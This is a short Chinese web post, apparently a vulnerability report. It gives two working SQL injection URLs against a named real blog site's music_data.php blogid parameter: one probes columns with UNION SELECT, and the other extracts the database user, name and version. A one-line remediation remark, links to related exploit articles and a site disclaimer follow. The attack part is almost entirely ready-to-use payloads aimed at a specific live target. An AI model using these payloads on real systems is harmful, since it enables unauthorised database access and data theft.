http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5--

http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,concat(user(),0x7c,database(),0x7c,version()),4,5--



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。
WEBSHELL箱子系统V1.0收信箱子代码漏洞分析及解决方法
利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)
版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。
发表评论